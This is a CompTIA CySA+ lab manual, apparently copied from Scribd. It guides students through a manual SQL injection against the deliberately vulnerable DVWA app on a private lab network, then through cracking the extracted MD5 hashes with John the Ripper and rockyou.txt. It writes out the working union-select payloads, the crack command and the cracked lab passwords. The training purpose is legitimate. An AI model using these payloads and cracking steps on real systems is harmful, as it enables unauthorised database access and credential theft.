Scribd
Upload
32 views

Lab16 Dvwa Manual SQL Injection and Password Cracking

Uploaded by

Alex Raptou
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
32 views

Lab16 Dvwa Manual SQL Injection and Password Cracking

Uploaded by

Alex Raptou
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 43

CompTIA Cybersecurity Analyst (CySA+)

DVWA - Manual SQL Injection and Password


Cracking

Introduction
Exercise 1 - DVWA Usage
Exercise 2 - Performing an SQL Injection Attack
Exercise 3 - Password Cracking with John
Summary

Introduction
The DVWA - Manual SQL Injection and Password Cracking module provides you
with the instructions and devices to develop your hands-on skills in the following topics:

DVWA Usage
Performing an SQL Injection Attack
Password Cracking with John

Lab time: It will take approximately 1 hour to complete this lab.

Exam Objectives

The following exam objectives are covered in this lab:

CS0-001 3.4 Given a scenario, analyze common symptoms to select the best course
of action to support incident response
CS0-001 4.2 Given a scenario, use data to recommend remediation of security
issues related to identity and access management
CS0-001 4.3 Given a scenario, review security architecture and make
recommendations to implement compensating controls
CS0-001 4.4 Given a scenario, use application security best practices while
participating in the Software Development Life Cycle (SDLC)
Lab Diagram

During your session, you will have access to the following lab configuration. Depending
on the exercises you may or may not use all of the devices, but they are shown here in the
layout to get an overall understanding of the topology of the lab.

Connecting to your lab

In this module, you will be working on the following equipment to carry out the steps
defined in each exercise.

PLABSA01 (Windows Server 2012 R2 - Domain Controller)


PLABWIN10 (Windows 10 - Domain Member)
PLABKALI01 (Kali 2016.2)

To start, simply choose a device and click Power on. In some cases, the devices may
power on automatically.

For further information and technical support, please see our Help and Support
page.
Copyright Notice
This document and its content is copyright of Practice-IT - © Practice-IT 2017. All rights reserved. Any
redistribution or reproduction of part or all of the contents in any form is prohibited other than the
following:
1. You may print or download to a local hard disk extracts for your personal and non-commercial use
only.
2. You may copy the content to individual third parties for their personal use, but only if you
acknowledge the website as the source of the material. You may not, except with our express written
permission, distribute or commercially exploit the content. Nor may you transmit it or store it in any
other website or other form of electronic retrieval system.

Exercise 1 - DVWA Usage


Damn Vulnerable Web App works using PHP/MySQL web applications that have been
engineered to be deliberately vulnerable to a great variety of attack vectors for the
purpose of allowing security professionals to test their skills and tools in a legal
environment. It’s a very useful tool when learning and applying the techniques to security
testing applications when using an SDLC.

In this exercise we will:

Activate DVWA
Connect to DVWA

Task 1 - Activate DVWA

In this task, we will be starting the DVWA web service through XAMPP so that the
website is broadcasting through the IP of the Windows 2012 server on the IP of
192.168.0.1. We will then start up Kali and connect to the device.

Step 1
Connect to PLABSA01, on the taskbar you will see the XAMPP icon, click this icon and
activate the application.
Figure 1.1 Screenshot of PLABSA01: XAMPP running.

This starts up the DVWA website which is has been configured to broadcast on the
PLABSA01 IP address.

Step 2
Now open up Internet Explorer and type into the address bar:

192.168.0.1

Press Enter.

This will take you to the website being broadcast by XAMPP; this is to confirm that the
site is up and working.
Type into the address bar.

http://192.168.0.1/dvwa/login.php

Figure 1.2 Screenshot of PLABSA01: DVWA site running.

This should present you with the login page for DVWA. Therefore we know the site is up
and working.

We can now close internet explorer.

Step 3
Ensure you have powered on all the devices listed in the introduction and connect to
PLABKALI01.
In the Username filed type the following:

root

Click Next.

Figure 1.3 Screenshot of PLABKALI01: Logging in to PLABKALI01 as root user.

Step 4
In the Password field type the following:

Passw0rd
Click Sign In.
Figure 1.4 Screenshot of PLABKALI01: Logging into PLABKALI01 as root user.

Step 5
You have successfully logged in to PLABKALI01.
Figure 1.5 Screenshot of PLABKALI01: Displaying successfully logged in to
PLABKALI01.

Task 2 - Connecting to DVWA

We will now connect to the DVWA service and confirm the website contents is working
through Firefox within Kali.

Step 1
Open Firefox ESR application and type into the address bar the following:

192.168.0.1/dvwa/login.php
Figure 1.7 Screenshot of PLABKALI01: DVWA accessed from Firefox.

Again, the site is confirmed to be up and working, but we will go a little further to make
sure of this now.

Step 2
Let’s now log into the site and begin working with it.

Type in the following credentials and click Login.

Username:

Admin
Password:

password
If Firefox ESR presents this reminder for password information, you can click
Remember.

Figure 1.8 Screenshot of PLABKALI01: Logging into DVWA.


Figure 1.9 Screenshot of PLABKALI01: DVWA main menu.

If you now scroll to the bottom of this page, you will see the following details.

Your username:

admin

Security Level:

low

PHPIDS:

disabled
Figure 1.10 Screenshot of PLABKALI01: DVWA main menu bottom.

The PHPIDS has been turned off for these exercises; that is why its listed as disabled.

Step 3
Scroll to the top of the page and Click in the left column Setup/Reset DB.
Figure 1.11 Screenshot of PLABKALI01: In the DVWA menu setting up a new
Database.

Step 4
Scroll down on the page and Click on the Create/ Reset Database button.
Figure 1.12 Screenshot of PLABKALI01: DVWA creating the DVWA database.

You will see an output telling you the database has been created, with users, some data, a
guestbook with data and the setup was successful. We are now ready to start a SQL
injection.
Figure 1.13 Screenshot of PLABKALI01: Displaying the new database has been
successfully created.

Stay logged into PLABKALI01 and move onto the next exercise.

Exercise 2 - Performing an SQL Injection Attack


SQL injections are used to inject code into applications which then pull out data which
typically shouldn’t be displayed. For example, the technic can be used to find personal
information of people which might be hidden from normal view presenting details like
username and passwords.

In this exercise, we will cover:


DVWA SQL Injection

Task 1 - DVWA SQL Injection Page

We are now going to perform a manual SQL Injection attack on the DVWA page to obtain
information about the database and the information that it contains regarding the
column headings, to work out where the user information is sitting.

Step 1
Click on the Tab for SQL Injection.

Figure 2.1 Screenshot of PLABKALI01: DVWA SQL Injection.

Now we will enter some details.


Step 2
We are presented with a field to enter a User ID.

Let’s try this out with basic credentials.

Type in the following and click Submit.

User ID: 2

Figure 2.2 Screenshot of PLABKALI01: DVWA SQL Injection ID results.

You will be given a readout of

First name: Gordon


Surname: Brown

Step 3
Switch back to the Firefox page and let’s begin.

Type into the User ID Field click Submit:

Figure 2.3 Screenshot of PLABKALI01: DVWA SQL Injection ID results.

We see results of:

ID:3
First Name: Hack

Surname: Me

We will move onto more advanced SQL terms now to work out the columns.

Type into the User ID Field and click Submit:

3’

Figure 2.4 Screenshot of PLABKALI01: DVWA error screen.

We get this error message which is a positive sign and strongly indicates this website is
vulnerable to SQL Injection.

Step 4
Type into the User ID Field and click Submit:
3’ and 1=1 #

Figure 2.5 Screenshot of PLABKALI01: DVWA SQL Injection results.

Type into the User ID Field:

3’ and 1=0 union select null, version() #


Figure 2.6 Screenshot of PLABKALI01: DVWA SQL Injection results.

Now we know that the database is MariaDB and its version 10.1.16

Type into the User ID Field:

3’ and 1=0 union select null, user() #


Figure 2.7 Screenshot of PLABKALI01: DVWA SQL Injection results.

The main user here is root@localhost.

Type into the User ID Field:

3’ and 1=0 union select null, database() #


Figure 2.8 Screenshot of PLABKALI01: DVWA SQL Injection results.

The database is confirmed now belonging to DVWA.

Step 5
Type into the User ID Field click Submit:

3’ and 1=0 union select null,table_name from


information_schema.tables #
Figure 2.9 Screenshot of PLABKALI01: DVWA SQL Injection results.

We are now presented with column headings through the table of the database. We can
see that there are a lot of different headings within this database. Take a moment to scan
through the different listings and you will see that there are columns for user privileges
and a variety of statistical information which are held in the database.

Type into the User ID Field:

3’ and 1=0 union select null,table_name from information_schema.tables where


table_schema!=’mysql’ and table_schema!=’information_schema’ #
Figure 2.10 Screenshot of PLABKALI01: DVWA SQL Injection results.

This command has brought up information about the account columns by calling on the
schema which contains those details. We see an that we have accessed information about
the guestbook, users and accounts fields.

Type into the User ID Field:

3’ and 1=0 union select null,table_name from information_schema.columns where


table_name=’users’ #
Figure 2.11 Screenshot of PLABKALI01: DVWA SQL Injection results.

Here we have picked out the column for only the users. We will now work on that column
specifically.

Step 6
Type into the User ID Field:

3’ and 1=0 union select


null,concat(table_name,0x0a,column_name) from
information_schema.columns where table_name=’users’ #
Figure 2.12 Screenshot of PLABKALI01: DVWA SQL Injection results.

Here we are beginning to produce really interesting results showing the Information
about users, first names and last names. We can also see that they use an avatar and
there is a field for the number of failed logins together with the list of connections to the
system.

Type into the User ID Field and click Submit:

3’ and 1=0 union select null,concat(first_name,0x0a,password) from users #


Figure 2.13 Screenshot of PLABKALI01: DVWA SQL Injection results.

We now have the information of the first name and the password hash values.

Now we must carefully record this information into leafpad.

Copy and paste the details directly from the DVWA page.
Figure 2.14 Screenshot of PLABKALI01: DVWA SQL Injection results.

Copy these details, remember to right-click on the screen and use the menu items.

Stay logged into PLABKALI01, minimize Firefox ESR and move onto the next exercise

Exercise 3 - Password Cracking with John


John the Ripper detects password hashes and then cracks the type of hash through either
bruteforce or by allocating John a password hash list for its use. It is used against DES,
MD5, Blowfish, Kerberos AFS and Windows LM hash. It will perform dictionary attacks
by hashing the wordlist and comparing the results against the password hash list.

In this exercise, you will perform the following tasks:


Making the Password Hash File

Using a Wordlist

Password Cracking and Validation

Task 1- Making the Password Hash File

We will extract the password hashes and make our own file to save them into, which will
be used by John the Ripper to scan and extract out the hash values for cracking purposes.

Step 1
Let’s Open up LeafPad from the terminal to begin recording the information we learn.

Click on:

Usual Applications > Accessories > Leafpad


Figure 3.1 Screenshot of PLABKALI01: Opening the Leafpad.

Follow the image above to open Leafpad up which is a notepad type tool for recording
information in plain format.
Figure 3.2 Screenshot of PLABKALI01: Leafpad.

Here we have a plain interface in Leafpad where we are going to record information of
interest.

Paste the contents of the DVWA into the file.


Figure 3.3 Screenshot of PLABKALI01: Leafpad.

Now tidy up the file by removing the commands listed, the first name field and the
surname field.
Figure 3.4 Screenshot of PLABKALI01: Leafpad.

Step 2
Then click on;

File > Save As

Type into the following field:

Name: password.txt

Then in the Places column change the directory to the Desktop and click the save
button.
Figure 3.5 Screenshot of PLABKALI01: Leafpad saving the file.

The Leafpad application can now be closed.

Task 2 - Using a Wordlist

We will use a wordlist to aid our cracking time and reduce it significantly in terms of how
long it would take to break the hash values through a brute force attack.

Step 1
Open a new terminal screen.

We will now prepare the password list to be used which will help us crack the passwords
faster than using a brute force attack.

Type the following in the console and press Enter after each command:
root@kali:# cd /usr/share/wordlists/
root@kali:/usr/share/wordlists# ls

Figure 3.6 Screenshot of PLABKALI01: Displaying the terminal window with


the commands successfully executed.

Type the following in the console and press Enter after each command:

root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz


root@kali:/usr/share/wordlists# ls
Figure 3.7 Screenshot of PLABKALI01: Output displaying a new text file called
rockyou.txt.

Here we can see that a new text file called rockyou.txt has been created.

Close the terminal screen and move on to the next task.

Task 3 - Password Cracking and Validation

Now we are going to use the John tool to cracking the hash values and providing us with
the passwords we need, after which we will test the results on the login page of DVWA to
validate which logins are allocated to login and if they work.

Step 1
Open up a new terminal and type the following command and press Enter:
john

This will display all the options that can be used with the password cracking application.

Figure 3.8 Screenshot of PLABKALI01: Output displaying the options with


password cracking application.

The John application will be used to crack the password file that was created on the
Desktop. It will be used to crack the hashes and display the passwords.

Step 2
Navigate to the directory where the passwords.txt is located.
Type the following commands in the terminal window pressing Enter after each
command:

root@kali:# cd Desktop
root@kali:~/Desktop# ls

Figure 3.9 Screenshot of PLABKALI01: Navigating to the directory.

Desktop directory is displayed where the password.txt file is located.

Step 3
The John application will now be used crack the password file.

Type the following command in 1 line in the terminal window and press Enter:
root@kali:~/Desktop# john --format=raw-md5 --
wordlist=/usr/share/wordlists/rockyou.txt password.txt

This command will display the passwords for the users of the DVWA website.

Figure 3.10 Screenshot of PLABKALI01: Output displaying the passwords of the


website.

Here we can see the passwords for;

admin : password

Gordon : abc123

Pablo : letmein
Hack : charley

Now just to verify logout of the DVWA site to come back to the original login page.

Do this by clicking on Logout in the left hand column.

Then type in and click Login:

Username: Pablo

Password: letmein

Figure 3.11 Screenshot of PLABKALI01: DVWA login screen.

Scroll down the page and you will see you have logged into Pablo’s account.
Figure 3.12 Screenshot of PLABKALI01: DVWA Main Menu.

Perfect we have now completed this exercise, we exploited the database, exfiltrated the
password hashes and users, then cracked the passwords and used Pablo to log back into
the database as his user account.

The steps taken above are in fact key to confirming the security around applications and
databases and are part of the security testing phase.

Shut down all virtual machines used in this exercise using Practice Labs power
button function to revert these devices to their default settings. Alternatively, you
may sign out to power down all devices.

Summary
You covered the following activities in this module:

DVWA Usage
Performing an SQL Injection Attack
Password Cracking with John

You might also like